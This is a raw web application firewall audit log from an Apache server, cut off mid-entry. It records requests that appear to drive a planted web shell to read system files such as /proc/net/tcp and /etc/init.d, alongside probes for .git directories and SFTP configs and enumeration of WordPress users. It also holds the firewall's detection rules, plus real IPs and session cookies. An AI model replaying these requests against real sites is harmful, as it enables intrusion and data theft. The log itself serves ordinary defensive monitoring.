127.0.0.1 7081 --19655e77-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/gawk.csh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.29.107.38 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --19655e77-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3182 Connection: close Content-Type: text/html; charset=UTF-8 --19655e77-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/gawk.csh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7BI3rzia-Xuz8LZxRSOgAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/gawk.csh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7BI3rzia-Xuz8LZxRSOgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749991715633925 4034 (- - -) Stopwatch2: 1749991715633925 4034; combined=2038, p1=348, p2=1542, p3=33, p4=33, p5=82, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19655e77-Z-- --de470a0f-A-- [15/Jun/2025:18:23:19.587225 +0530] aE7CPwA7noq-Jjeat46yqAAAAAI 52.202.233.37 40016 127.0.0.1 7081 --de470a0f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self&viewfile=//proc/self/mounts HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.202.233.37 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --de470a0f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3613 Connection: close Content-Type: text/html; charset=UTF-8 --de470a0f-H-- Message: Warning. Matched phrase "proc/self/mounts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/mounts found within ARGS:viewfile: /proc/self/mounts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/mounts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/mounts found within ARGS:viewfile: /proc/self/mounts"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7CPwA7noq-Jjeat46yqAAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749991999582971 4306 (- - -) Stopwatch2: 1749991999582971 4306; combined=2253, p1=369, p2=1753, p3=37, p4=35, p5=59, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de470a0f-Z-- --04c9fd01-A-- [15/Jun/2025:18:30:33.852764 +0530] aE7D8Fu1-lKBbvo2E9pKiwAAAAw 198.71.51.75 40058 127.0.0.1 7081 --04c9fd01-B-- GET /.git/branches/ HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 198.71.51.75 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: WP Rocket/Preload Accept: */* Accept-Encoding: deflate, gzip, br, zstd --04c9fd01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/", <https://www.futuronomics.com/wp-json/wp/v2/media/4005>; rel="alternate"; title="JSON"; type="application/json", <https://www.futuronomics.com/?p=4005>; rel=shortlink Set-Cookie: wpr_guest_token=a9ac37e353c218942c17f60eb05db3825b7e65913b3db2e73fcd690b8670f36d; expires=Sun, 15 Jun 2025 14:00:33 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Last-Modified: Sun, 15 Jun 2025 13:00:33 GMT Content-Encoding: gzip Content-Length: 20863 Connection: close Content-Type: text/html; charset=UTF-8 --04c9fd01-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.futuronomics.com"] [uri "/.git/branches/"] [unique_id "aE7D8Fu1-lKBbvo2E9pKiwAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749992432029869 1822966 (- - -) Stopwatch2: 1749992432029869 1822966; combined=2181, p1=517, p2=1572, p3=0, p4=0, p5=91, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04c9fd01-Z-- --0de62448-A-- [15/Jun/2025:18:32:03.937902 +0530] aE7ES3rzia-Xuz8LZxRTSgAAAAg 23.20.178.124 42054 127.0.0.1 7081 --0de62448-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/uuidd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 23.20.178.124 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --0de62448-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3557 Connection: close Content-Type: text/html; charset=UTF-8 --0de62448-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/uuidd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7ES3rzia-Xuz8LZxRTSgAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/uuidd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7ES3rzia-Xuz8LZxRTSgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749992523933824 4130 (- - -) Stopwatch2: 1749992523933824 4130; combined=2289, p1=330, p2=1803, p3=37, p4=35, p5=84, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0de62448-Z-- --4585e247-A-- [15/Jun/2025:18:39:48.824813 +0530] aE7GGwG_OhOIIVz6TXRpKgAAAAA 13.38.123.21 55894 127.0.0.1 7081 --4585e247-B-- GET /sftp-config.json HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 13.38.123.21 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --4585e247-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.medikonindia.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --4585e247-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/sftp-config.json"] [unique_id "aE7GGwG_OhOIIVz6TXRpKgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749992987768179 1056695 (- - -) Stopwatch2: 1749992987768179 1056695; combined=2091, p1=719, p2=1287, p3=0, p4=0, p5=85, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4585e247-Z-- --5939166d-A-- [15/Jun/2025:18:41:59.736478 +0530] aE7GnlA3y-oVjWA7wCAxLQAAABA 13.233.108.101 59922 127.0.0.1 7081 --5939166d-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.gulachi.com X-Real-IP: 13.233.108.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=4qgbaq732k6s0n585jsg6peb8i; _sfs_id=554ba2e970f1e91d1db0da29c45610b51749993116 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --5939166d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, X-OptinMonster-ApiKey X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: This is a REST API request (identified by REST_REQUEST constant) Connection: close Content-Type: application/json; charset=UTF-8 --5939166d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.gulachi.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE7GnlA3y-oVjWA7wCAxLQAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749993118147546 1589052 (- - -) Stopwatch2: 1749993118147546 1589052; combined=2522, p1=332, p2=2060, p3=0, p4=0, p5=130, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5939166d-Z-- --c6eef410-A-- [15/Jun/2025:18:48:00.873199 +0530] aE7ICA2U8ofTdsKp_yhVvwAAAAU 162.158.49.191 51920 127.0.0.1 7081 --c6eef410-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.getcalley.com X-Real-IP: 162.158.49.191 X-Forwarded-For: 13.74.44.234 Connection: close cf-ray: 950259d4dd1fbe2d-DUB cdn-loop: cloudflare; loops=1 accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: IE cf-connecting-ip: 13.74.44.234 cf-visitor: {"scheme":"https"} cookie: wordpress_test_cookie=WP%20Cookie%20check --c6eef410-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13867 Connection: close Content-Type: text/html; charset=UTF-8 --c6eef410-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.getcalley.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE7ICA2U8ofTdsKp_yhVvwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749993480512334 360952 (- - -) Stopwatch2: 1749993480512334 360952; combined=154758, p1=319, p2=1506, p3=0, p4=0, p5=76523, sr=98, sw=0, l=0, gc=76410 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6eef410-Z-- --55121e6e-A-- [15/Jun/2025:18:49:47.888732 +0530] aE7Ic1A3y-oVjWA7wCAx_AAAABA 100.29.63.24 60418 127.0.0.1 7081 --55121e6e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/maillog.processed.1.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.29.63.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --55121e6e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2956 Connection: close Content-Type: text/html; charset=UTF-8 --55121e6e-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /var/log/maillog.processed.1.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7Ic1A3y-oVjWA7wCAx_AAAABA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749993587883501 5312 (- - -) Stopwatch2: 1749993587883501 5312; combined=2923, p1=460, p2=2286, p3=51, p4=49, p5=77, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --55121e6e-Z-- --73bfea2f-A-- [15/Jun/2025:18:49:56.017549 +0530] aE7Ie1A3y-oVjWA7wCAx_wAAABA 185.157.214.24 53046 127.0.0.1 7081 --73bfea2f-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: best-website-designs.com X-Real-IP: 185.157.214.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip --73bfea2f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --73bfea2f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aE7Ie1A3y-oVjWA7wCAx_wAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749993595137031 880600 (- - -) Stopwatch2: 1749993595137031 880600; combined=2025, p1=330, p2=1610, p3=0, p4=0, p5=85, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73bfea2f-Z-- --0a65ce23-A-- [15/Jun/2025:18:50:27.952990 +0530] aE7Im_GquvQgFtcpmQJUZgAAAAE 34.194.95.99 46348 127.0.0.1 7081 --0a65ce23-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/net&viewfile=//proc/net/tcp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.194.95.99 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --0a65ce23-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 7112 Connection: close Content-Type: text/html; charset=UTF-8 --0a65ce23-H-- Message: Warning. Matched phrase "proc/net/tcp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/tcp found within ARGS:viewfile: /proc/net/tcp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/tcp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/tcp found within ARGS:viewfile: /proc/net/tcp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7Im_GquvQgFtcpmQJUZgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749993627946996 6045 (- - -) Stopwatch2: 1749993627946996 6045; combined=1963, p1=382, p2=1472, p3=33, p4=26, p5=50, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0a65ce23-Z-- --55345411-A-- [15/Jun/2025:19:00:44.462520 +0530] aE7LA_GquvQgFtcpmQJVWwAAAAE 203.30.15.62 56562 127.0.0.1 7081 --55345411-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 203.30.15.62 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.9637.1472 Mobile Safari/537.36 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=c22b32ff7c2720af19e6563c77e32c2f1749994236; _fbp=fb.1.1749994243197.949714852138021539 --55345411-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=nm25r1ijumdedt9a5ve9upagdv; expires=Sat, 13 Sep 2025 13:30:44 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --55345411-E-- --55345411-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE7LA_GquvQgFtcpmQJVWwAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE7LA_GquvQgFtcpmQJVWwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749994243420803 1041816 (- - -) Stopwatch2: 1749994243420803 1041816; combined=3127, p1=449, p2=2390, p3=126, p4=33, p5=128, sr=110, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --55345411-Z-- --4fe45d26-A-- [15/Jun/2025:19:04:00.313173 +0530] aE7LyAG_OhOIIVz6TXRrlQAAAAA 3.210.29.96 43044 127.0.0.1 7081 --4fe45d26-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apt/apt.conf.d HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.210.29.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4fe45d26-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3829 Connection: close Content-Type: text/html; charset=UTF-8 --4fe45d26-H-- Message: Warning. Matched phrase "etc/apt/apt.conf" at ARGS:path. [file 